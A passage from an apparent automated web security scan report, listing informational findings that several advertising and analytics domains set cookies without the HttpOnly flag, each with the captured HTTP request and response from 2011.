Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: uid. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /serve/fb/adtag.js?tid=68283&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/6291/9346/15214-2.3214995.3237976?url= HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315096959_34024:68283:1:0:0_34024:68292:2:118796:118878_34023:68293:1:119509:119509; uid=1_1315096959_1314893682667:5756480826433243; kwd=1_1315096959; scg=1_1315096959; ppd=1_1315096959; act=1_1315096959

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:44:11 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315097051_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:44:11 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 00:44:11 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 293

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68283&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/6291/9346/15214-2.3214995.3237976?url=' width='728' height
...[SNIP]...

14.53. http://imp.fetchback.com/serve/fb/imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: cre, uid, kwd, scg, ppd, act. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/imp?tid=68283&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/6291/9346/15214-2.3214995.3237976?url= HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315096959_34024:68283:1:0:0_34024:68292:2:118796:118878_34023:68293:1:119509:119509; kwd=1_1315096959; scg=1_1315096959; ppd=1_1315096959; act=1_1315096959; uid=1_1315097051_1314893682667:5756480826433243

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:44:11 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cre=1_1315097051_34024:68283:2:0:92_34024:68292:2:118888:118970_34023:68293:1:119601:119601; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:44:11 GMT; Path=/
Set-Cookie: uid=1_1315097051_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:44:11 GMT; Path=/
Set-Cookie: kwd=1_1315097051; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:44:11 GMT; Path=/
Set-Cookie: scg=1_1315097051; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:44:11 GMT; Path=/
Set-Cookie: ppd=1_1315097051; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:44:11 GMT; Path=/
Set-Cookie: act=1_1315097051; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:44:11 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 00:44:11 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 5489

<style type="text/css">body {margin: 0px; padding: 0px;}</style><style type="text/css">
/*
TODO customize this sample style
Syntax recommendation http://www.w3.org/TR/REC-CSS2/
*/

button.fb-fi
...[SNIP]...

14.54. http://js.revsci.net/gateway/gw.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: udm_0 (cleared and then re-issued in the same response). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=J06575 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby6k3FFNuXo3vkdcB6Qb/nUpD6A==; NETID01=c84fd631153807952fe54cd0e5ae7570; rtc_H9PS=MLuBc48HgVlDFVRDdcKRF0hEtq+QxWzJMWpcEHBw; rsiPus_-Jfi="MLs3rM9rsF9jIDGyCCr682K4CNg8X7Y5TcUKMiQFekBN/mLe5nqMalU+Gy7oNgbZiUlKeqNvah6Lt6J7LWR+El708xKeHRN+oI/OdQ15h+vMTW6JE0MEL7RHL9MaSpr1EQ5M4r4OllpRkRseMAEP4XpmNxvt4zBx4/LsxjIzx0J+4PMlNVWbY30OlroflhaTjXYvF17b"; rsi_us_1000000="...[SNIP]..."

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=...[SNIP]...; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:42:17 GMT; Path=/
Last-Modified: Sun, 04 Sep 2011 00:42:17 GMT
Cache-Control: max-age=3600, private
Expires: Sun, 04 Sep 2011 01:42:17 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:42:16 GMT
Content-Length: 6201

//AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC)
var rsi_now= new Date();
var rsi_csid= 'J06575';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da)
...[SNIP]...

14.55. http://leadback.advertising.com/adcedge/lb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: C2, GUID (DBC is cleared in the same response with a 1970 expiry). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&betr=tc=99999&guidm=1:1765ifu1akkc79&bnum=4006 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2=mq6XO9aFIYIiGA3sQhwSkaAc

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 01:08:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=D+sYO9aFHYIiGS8sQdwSkaIxSKMCdbdBwB; domain=advertising.com; expires=Tue, 03-Sep-2013 01:08:19 GMT; path=/
Set-Cookie: GUID=MTMxNTA5ODQ5OTsxOjE3NjVpZnUxYWtrYzc5OjM2NQ; domain=advertising.com; expires=Tue, 03-Sep-2013 01:08:19 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Sun, 04 Sep 2011 02:08:19 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

14.56. http://legolas.nexac.com/lgalt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://legolas.nexac.com
Path:   /lgalt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: lgtix. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lgalt?ci=7&ti=73&sti=28&sei=0&sci=2&ai=0&mi=0&pbi=0&sts=1315096943558457&sui=5ea31fa9-d42d-458f-9bb4-1700d69738c0 HTTP/1.1
Host: legolas.nexac.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:56:05 GMT
Server: Apache
Expires: -1
Cache-Control: no-cache; no-store
Content-Type: image/gif
Set-Cookie: lgtix=SQACADMB; path=/; expires=Wed, 03 Sep 2014 00:56:05 GMT; domain=.legolas-media.com
P3P: policyref="http://www.legolas-media.com/w3c/p3p.xml",CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Length: 42
Connection: close

GIF89a.............!.......,...........D.;

14.57. http://load.exelator.com/load/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://load.exelator.com
Path:   /load/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: TFF. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /load/?p=104&g=080&j=0&u=1234567&site=2222 HTTP/1.1
Host: load.exelator.com
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: image/gif
Set-Cookie: TFF=eJxLtDK1qi62MjSyUjI0MHEwsDBwsLS0NFKyTrQysqrOtDK0BmJzA3MgZQBj1mKoNwSpN0ZTbwTFyPrM4dqI0wGkDUyINzs1IjUnsSSVOLNrAXTxQVw%253D; expires=Mon, 02-Jan-2012 01:13:04 GMT; path=/; domain=.exelator.com
Location: http://segments.adap.tv/data/?p=exelate&uid=1234567&sid=2222&ag=!!AGE!!&seg=
Content-Length: 0
Date: Sun, 04 Sep 2011 01:13:04 GMT
Server: HTTP server
Connection: Keep-alive
Keep-Alive: timeout=15, max=100
Via: 1.1 AN-AMP_TM uproxy-2


14.58. http://log.adap.tv/log

Summary

Severity:   Information
Confidence:   Certain
Host:   http://log.adap.tv
Path:   /log

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: asptvw1. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /log?event=videoView&adPlanId=4148&adaptag=&categories=sports&sessionId=25w4w9&nap=false&context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte+Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&height=225&htmlEnabled=true&key=cinesport&uid=-7050735172170286629&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&duration=&id=&url=&width=300&zid=&playHeadTime=0&as=3&viewNo=&serverRev=66573&playerRev=66583&eov=1315097086197 HTTP/1.1
Host: log.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"; adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+17%3A44%3A46"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Content-Type: text/plain
Connection: Keep-Alive
Set-Cookie: asptvw1="ap4148%2C2%2C2011-09-03%2F18-44-50";Path=/;Domain=.adap.tv;Expires=Wed, 13-May-2043 03:01:57 GMT
Content-Length: 0


14.59. http://nmcharlotte.112.2o7.net/b/ss/nmcharlotte/1/H.20.3/s85129847696516

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nmcharlotte.112.2o7.net
Path:   /b/ss/nmcharlotte/1/H.20.3/s85129847696516

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: s_vi_efhcjygdx7Fx7Fn. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/nmcharlotte/1/H.20.3/s85129847696516?AQB=1&ndh=1&t=3/8/2011%2019%3A45%3A22%206%20300&pageName=Story%3A%202577566%7CRaceday%26%2358%3B%20Danica%20already%20gone%26%2363%3B&g=http%3A//www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html&r=http%3A//www.google.com/trends/hottrends%3Fq%3Dsprint%26date%3D2011-9-3%26sa%3DX&cc=USD&ch=Charlotte%20Observer%3A%20Sports%20%7C%20*%20Sports%20Hold%20%7E%20Sports&server=charlotteobserver.com&events=event7&c1=http%3A//www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html&h1=CLT%7CCharlotte%20Observer%7CSports%7C%7C%7C%7C%7CSports%20%7C%20*%20Sports%20Hold%20%7E%20Sports&c2=1.0%7C&c3=*Story&v3=Cal%20Monthly%20Visit%20Number%3A%201&c4=charlotteobserver%7CManual%20Entry%7Cjutter@charlotteobserver.com%7C%26%238236%3BBy%20Jim%20Utter%26%238237%3B&v4=Story%3A%202577566%7CRaceday%26%2358%3B%20Danica%20already%20gone%26%2363%3B&c5=Unknown&c6=CLT%7CCharlotte%20Observer%7CSports%7C%7C%7C%7C%7CSports%20%7C%20*%20Sports%20Hold%20%7E%20Sports&c10=http%3A//www.charlotteobserver.com/2011/09/03/2577566_raceday-danica-already-gone.html&c13=Unknown&c20=GUID%3A%201583150943143157846%20%7C%20Story%3A%202577566%7CP%3A%20Charlotte%20Observer%3A%20Sports%20%7C%20*%20Sports%20Hold%20%7E%20Sports%20%3A%20charlotteobserver.com&c31=2011/09/03&c32=2011/09/03%20H20&c33=8%3A30PM&c34=Saturday&c37=237%7C2577566%7Chttp%3A//www.charlotteobserver.com/2011/09/03/2577566_raceday-danica-already-gone.html&c39=%20&c42=Cal%20Monthly%20Visit%20Number%3A%201&c43=Entry%20Page&c44=Entry%20Page&c48=NoTextAd%3A%20*Story%3Acharlotteobserver.com%3ASports%20%7C%20*%20Sports%20Hold%20%7E%20Sports&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: nmcharlotte.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 01:06:24 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_efhcjygdx7Fx7Fn=[CS]v4|27316788050129B3-4000010AC034C512|4E62C9FC[CE]; Expires=Fri, 2 Sep 2016 01:06:24 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sat, 03 Sep 2011 01:06:24 GMT
Last-Modified: Mon, 05 Sep 2011 01:06:24 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E62CF10-534D-7B222958"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
Location: http://b.scorecardresearch.com/r?c2=6035363&d.c=gif&d.o=nmcharlotte&d.x=245456460&d.t=page&d.u=http%3A%2F%2Fwww.charlotteobserver.com%2F2011%2F09%2F03%2F2577566%2Fraceday-danica-already-gone.html
xserver: www86
Content-Length: 0
Content-Type: text/plain


14.60. http://odb.outbrain.com/utils/get

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/get

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: tick, _lvs2, _lvd2, _rcc2, recs-1ac7243e27be1904dc4b28c0c3b41b7f. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /utils/get?url=http%3A%2F%2Fcontent.usatoday.com%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1&settings=true&recs=true&widgetJSId=AR_2&key=AYQHSUWJ8576&idx=0&version=42206&ref=http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX&apv=false&sig=rsi_seg&format=html&rand=88096 HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tick=1315097079013; Domain=outbrain.com; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="RifDljbBnUo="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Sun, 30-Sep-2012 00:44:39 GMT; Path=/
Set-Cookie: _lvd2="a20VgmTZEaeQlaVAQ/tI3Q=="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Sat, 10-Sep-2011 13:32:39 GMT; Path=/
Set-Cookie: _rcc2="/RlY4kI4x+EC5hF25OSb5Q=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Sun, 30-Sep-2012 00:44:39 GMT; Path=/
Set-Cookie: recs-1ac7243e27be1904dc4b28c0c3b41b7f="5sHw/4cdKR1RBwoxQ+NK56Gt39jPhS7BtAFn45s7nNxBJBStyd24vYRw03xty00LSHEMw5NUdblMWfcjIdzz7o0VClIcP3suYYfuX/vSYbkv2mx6/RuYBJJtD16TCm5FO5dLo73fEkx5WOXcO9UcZQ=="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Sun, 04-Sep-2011 00:49:39 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:44:38 GMT
Content-Length: 15137

var ob_clbk=(typeof(OBR.extern)==='undefined')?outbrain:OBR.extern;ob_clbk.returnedHtmlData({"response":{"html":"\u003cdiv class\u003d\"ob_dual_container AR_2\"\u003e\n \u003cspan class\u003d\"ob_em
...[SNIP]...

14.61. http://optimized-by.rubiconproject.com/a/4462/5032/7102-15.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4462/5032/7102-15.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: nus_2046, rdk, rdk15, ses15, csi15. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/4462/5032/7102-15.js?cb=0.9818868087604642 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; rpb=7908%3D1%264940%3D1%265364%3D1; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:45:00 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: nus_2046=0.00; expires=Mon, 05-Sep-2011 00:45:00 GMT; max-age=86400; path=/; domain=.rubiconproject.com
Set-Cookie: rdk=4462/5032; expires=Sun, 04-Sep-2011 01:45:00 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Sun, 04-Sep-2011 01:45:00 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=5032^2&9346^1; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=112499; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3214998.js^1^1315097100^1315097100&3203911.js^1^1315097079^1315097079; expires=Sun, 11-Sep-2011 00:45:00 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1133

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3214998"
...[SNIP]...

14.62. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4462/5032/7102-2.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/4462/5032/7102-2.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; rpb=7908%3D1%264940%3D1%265364%3D1; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=4462/5032; rdk15=0; ses15=5032^1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:45:17 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Sun, 04-Sep-2011 01:45:17 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Sun, 04-Sep-2011 01:45:17 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=5032^2&9346^1; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=112482; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 2173

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

14.63. http://optimized-by.rubiconproject.com/a/6291/9346/15214-15.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6291/9346/15214-15.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/6291/9346/15214-15.js?cb=0.6276808138936758&fr=false HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses15=5032^1; rdk=6291/9346; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%265364%3D1%267751%3D1; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:05:03 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6291/9346; expires=Sun, 04-Sep-2011 02:05:03 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Sun, 04-Sep-2011 02:05:03 GMT; max-age=10; path=/; domain=.rubiconproject.com
